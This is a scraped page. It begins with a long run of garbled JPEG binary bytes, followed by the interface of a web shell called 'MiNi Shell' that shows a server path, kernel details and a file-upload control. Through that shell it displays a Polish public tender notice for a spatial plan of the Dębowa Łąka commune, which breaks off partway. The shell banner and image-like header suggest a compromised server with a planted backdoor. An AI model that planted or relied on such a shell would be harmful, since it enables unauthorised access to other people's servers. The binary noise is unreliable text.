JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241213/0065223101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie Planu ogólnego gminy Dębowa Łąka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DĘBOWA ŁĄKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118796</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dębowa Łąka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-207</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(56)6884910</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugdl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://debowalaka.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie Planu ogólnego gminy Dębowa Łąka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2e85ab4-3e68-4d25-96ef-3d0190e04681</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00652231</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00030859/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Sporządzenie Planu ogólnego gminy Dębowa Łąka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ugdl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ugdl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.16.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 158891,87 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Opis przedmiotu zamówienia:<br/>2)	Przedmiotem zamówienia jest sporządzenie analizy aktualności planów miejscowych oraz sporządzenie projektu planu ogólnego Gminy Dębowa Łąka. W ramach zamówienia Wykonawca opracuje projekt planu ogólnego, dla obszaru całej gminy Dębowa Łąka, objętego uchwałą Nr 40/24 z dnia 12 sierpnia 2024 r. w sprawie przystąpienia do sporządzania planu ogólnego gminy Dębowa Łąka.<br/>3)	Przedmiot zamówienia musi zostać wykonany zgodnie z obowiązującymi w tym zakresie przepisami prawa, w szczególności zgodnie z ustawą z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2024 roku, poz. 1130), rozporządzeniem Ministra Rozwoju i Technologii z dnia 8 grudnia 2023 roku w sprawie projektu planu ogólnego gminy, dokumentowania prac planistycznych w zakresie tego planu oraz wydawania z niego wypisów i wyrysów (Dz. U. z 2023 r. poz. 2758) oraz innymi przepisami obowiązującymi w tym zakresie. <br/>4)	Zakres przedmiotu zamówienia obejmuje w szczególności: <br/>a)	Ocenę istniejącego stanu zagospodarowania terenu (na podstawie materiałów otrzymanych od Zamawiającego oraz przeprowadzonej przez Wykonawcę inwentaryzacji terenowej). <br/>b)	Sporządzenie analizy aktualności planów miejscowych oraz analiza ewentualnego oddziaływania elektrowni wiatrowych na terenie gminy zakończona uchwałą Rady Gminy.<br/>c)	Sporządzenie projektu Planu ogólnego i omówienie projektu z Zamawiającym.<br/>d)	Przygotowywanie niezbędnej korespondencji, obwieszczeń, ogłoszeń i innych dokumentów wymaganych w procedurze sporządzenia planu w wersji elektronicznej. <br/>e)	Sporządzenie projektu Planu z prognozą oddziaływania na środowisko do opiniowania, uzgadniania, publicznego wyłożenia. <br/>f)	Przygotowanie w wersji elektronicznej opinii (wraz z uzasadnieniem) w kwestii przyjęcia lub odrzucenia wniosków, opinii i uwag oraz sporządzenie ich wykazów. <br/>g)	Wprowadzanie zmian w sporządzanym Planie wynikających z uwzględnionych wniosków, opinii, uzgodnień oraz uwag. <br/>h)	Omówienie i zaprezentowanie w siedzibie Zamawiającego: <br/>− projektu Planu przed organami gminy, <br/>− projektu Planu podczas konsultacji społecznych, <br/>− projektu Planu przed Radą Gminy Dębowa Łąka. <br/>i)	Udział w posiedzeniach komisji urbanistyczno-architektonicznej. <br/>j)	Sporządzenie opracowania ekofizjograficznego – 1 egzemplarz w wersji papierowej kolorowej i 1 egzemplarz w wersji elektronicznej. <br/>k)	Sporządzenie prognozy oddziaływania ustaleń Planu na środowisko w 1 egzemplarz <br/>w formie papierowej i w 1 egzemplarzu umożliwiającym powielanie dokumentacji (forma papierowa) oraz w 1 egzemplarzu na płycie CD (format Word, jpg itp.). <br/>l)	Przygotowanie wszystkich materiałów niezbędnych do przeprowadzenia konsultacji społecznych np.: prezentacji, ankiet, geoankiet, ulotek itp. <br/>m)	Udział w konsultacjach społecznych dotyczących projektu planu ogólnego oraz udzielanie stosownych informacji i wyjaśnień. <br/>n)	Sporządzenie raportu podsumowującego przebieg konsultacji społecznych. <br/>o)	Wykonawca odpowiada za koordynację prawidłowości przebiegu procedury planistycznej. <br/>p)	Sporządzenie dokumentacji prac planistycznych zgodnie z § 7 rozporządzenia wskazanego w punkcie 2 niniejszego opisu. <br/>q)	Sporządzenie ostatecznej wersji Planu: <br/>	w formie pliku gml,<br/>	uchwały i uzasadnienia w formie papierowej – 3 egzemplarzy, i egz. elektronicznie<br/>r)	Opracowanie i przekazanie Zamawiającemu danych przestrzennych projektu planu ogólnego w wersji przygotowanej do uzgodnień, do publicznego wyłożenia i uchwalonego Planu wymaganych zgodnie z rozdziałem 5a ustawy z dnia 27 marca 2003 roku <br/>o planowaniu i zagospodarowaniu przestrzennym. Pliki te winny być logicznie uporządkowane i nazwane na płycie CD.<br/>s)	Sporządzenie poprawionego projektu planu w przypadku stwierdzenia przez Radę Gminy Dębowa Łąka konieczności dokonania zmian w Planie, uchylenia lub stwierdzenia nieważności części lub całej uchwały przez Wojewodę Kujawsko – Pomorskiego lub sąd administracyjny. <br/>5)	Zamawiający zapewni obsługę kancelaryjną (adresowanie, wysyłanie) procedury uchwalenia Planu i poniesie koszty operacyjne (opłaty pocztowe, koszty ogłoszeń prasowych, publicznego wyłożenia). <br/>6)	Wykonawca jest zobowiązany do uzyskania własnym staraniem i na własny koszt wszystkich materiałów, innych opracowań itp. niezbędnych do wykonania przedmiotu zamówienia. Zamawiający może wystąpić do Starosty Wąbrzeskiego o udostępnienie mapy ewidencyjnej <br/>z państwowego zasobu geodezyjnego i kartograficznego w formie elektronicznej (gml), <br/>2.	Wymaga się, aby przedmiotowa dokumentacja została sporządzona z należytą starannością, <br/>w sposób zgodny z ustaleniami z Zamawiającym, wymaganiami ustaw i innymi przepisami <br/>w zakresie dotyczącym dokumentacji. <br/>3.	Opracowana dokumentacja musi być zgodna z art. 100 ust. 1 ustawy Pzp stanowiącym, że „W przypadku zamówień przeznaczonych do użytku osób fizycznych, w tym pracowników zamawiającego, opis przedmiotu zamówienia sporządza się z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych lub projektowania z przeznaczeniem dla wszystkich użytkowników”.<br/>4.	Zapisy dotyczące przekazania praw autorskich zostały określone w projektowanych postanowieniach umowy stanowiących Załącznik Nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71410000-5 - Usługi planowania przestrzennego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria, którymi Zamawiający będzie się kierował przy ocenie oferty wraz z podaniem znaczenia (wag) tych kryteriów:<br/>1) cena - 60%,<br/>2) termin płatności - 40%.<br/>2. Kryterium – cena.<br/>Cena oferty – C, <br/>oferta z najniższą ceną otrzyma maksymalną ilość punktów = 100, pomnożone przez współczynnik 0,60; <br/>oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej, wg wzoru<br/>C = (C n / C b) x 100 x 0,60<br/>gdzie:<br/>C - liczba punktów za kryterium cena<br/>C n - cena oferty z najniższą ceną<br/> C b - cena oferty badanej <br/>Maksymalna liczba punktów jaką może uzyskać wykonawca w kryterium „cena” wynosi 60 pkt.<br/>3. Kryterium – termin płatności.<br/>1) Minimalny termin płatności wynosi 7 dni od dnia dostarczenia faktury;<br/>2) Maksymalny termin płatności wynosi 30 dni od dnia dostarczenia faktury;<br/><br/>T = (T o / T max ) x 100 x 0,40<br/>gdzie:<br/>T – liczba punktów za kryterium termin płatności<br/>T o – termin płatności (w dniach) podany w ofercie badanej<br/>T max – termin płatności (w dniach) podany w ofercie z najdłuższym terminem płatności spośród wszystkich ocenianych ofert.<br/>Maksymalna liczba punktów jaką może uzyskać oferent w kryterium „termin płatności” wynosi 40 pkt.<br/>Punkty przyznane w oparciu o deklarację wykonawcy w formularzu ofertowym, przy czym preferowane przez Zamawiającego terminy płatności to 7, 14, 21 lub 30 dni.<br/>4. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>5. Oferta najkorzystniejsza, to oferta która uzyska najkorzystniejszy bilans ceny oraz terminu <br/> płatności. <br/>O = C + T<br/>O – łączna liczba punktów uzyskana w ocenie<br/>C – liczba punktów za kryterium cena <br/>T – liczba punktów za kryterium termin płatności<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>7. Jeżeli oferty uzyskały taką samą ocenę, zamawiający wybierze ofertę z najniższą ceną.<br/>8. Jeżeli nie będzie można wybrać oferty w sposób, o którym mowa w ust. 7 Zamawiający wezwie wykonawców, którzy złożyli oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt. Wykonawcy składając oferty dodatkowe, nie mogą oferować cen lub kosztów wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale XV SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu, o których mowa w art. 112 ust 2 Ustawy Pzp, a dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; <br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza szczegółowego warunku <br/>w tym zakresie;<br/>4) zdolności technicznej lub zawodowej:<br/>a)	Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie zrealizował co najmniej: <br/>- jedną usługę polegającą na opracowaniu studium uwarunkowań i kierunków zagospodarowania przestrzennego (lub zmianie tego dokumentu) lub dwie usługi polegające na opracowaniu projektu miejscowego planu zagospodarowania przestrzennego, dla powierzchni nie mniejszej niż 50 ha.<br/><br/>Minimum jedna z wykazanych usług musi dotyczyć opracowania dokumentów dla gminy wiejskiej. <br/>Opracowanie mpzp musi być zakończone publikacją w Dzienniku Urzędowym Województwa <br/>i brakiem rozstrzygnięcia nadzorczego uchylającego uchwałę w całości. <br/>Opracowanie studium musi być zakończone podjęciem uchwały Rady Gminy/Miasta <br/>w sprawie uchwalenia studium/zmiany studium i brakiem rozstrzygnięcia nadzorczego uchylającego uchwałę w całości.<br/>b)	Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum 1 (jedną) osobą, posiadającą uprawnienia do sporządzania planów ogólnych, o których mowa w art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2024 r. poz. 1130), a która to osoba jest autorem lub współautorem wykonanych w oparciu o wyżej wymienioną ustawę dokumentów planowania przestrzennego wskazanych w Rozdziale XVI pkt 4 lit. a). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Oświadczenie o przynależności/braku przynależności do tej samej grupy kapitałowej – załącznik nr 11. <br/>2.	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp – załącznik nr 12.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu dotyczących zdolności technicznych lub zawodowych, Zamawiający, żąda następujących podmiotowych środków dowodowych:<br/>a) Wykaz osób – min. 1 osoba, którą dysponuje Wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia, która spełnia co najmniej jeden z warunków zawartych w art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t. j. Dz. U. z 2023 r., poz. 977 ze zm.) z załączeniem referencji lub innych dokumentów potwierdzających kwalifikacje zawodowe oraz doświadczenie niezbędne do wykonywania zamówienia – według wzoru – Załącznik Nr 8 do SWZ,<br/><br/>b) wykaz usług wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane - według wzoru – Załącznik Nr 9 do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy – załącznik nr 1. <br/>2)	Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia – załącznik nr 7 – jeżeli dotyczy.<br/>3)	Oświadczenie podmiotu udostępniającego zasoby Wykonawcy w zakresie podstaw do wykluczenia z postępowania – załącznik nr 4 – jeżeli dotyczy. <br/>4)	Oświadczenie podmiotu udostępniającego zasoby dotyczące spełniania warunków udziału w postepowaniu – załącznik nr 5 – jeżeli dotyczy<br/>5)	Oświadczenie wykonawców wspólnie ubiegających się o zamówienie z art. 117 ust. 4 ustawy Pzp– załącznik nr 6 – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>1) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) Oferta składana przez Wykonawców występujących wspólnie musi być sporządzona zgodnie <br/>z ww. SWZ oraz spełniać dodatkowe wymagania:<br/>a) wszyscy wykonawcy ustanawiają pełnomocnika do reprezentowania ich łącznie <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania, także oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia,<br/>b) pełnomocnictwo musi być podpisane w sposób zgodny z zasadami reprezentacji wynikającymi z przepisów prawa, aktów wewnętrznych przedsiębiorców lub udzielonego pełnomocnictwa, wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik;<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4) W przypadku, o którym mowa 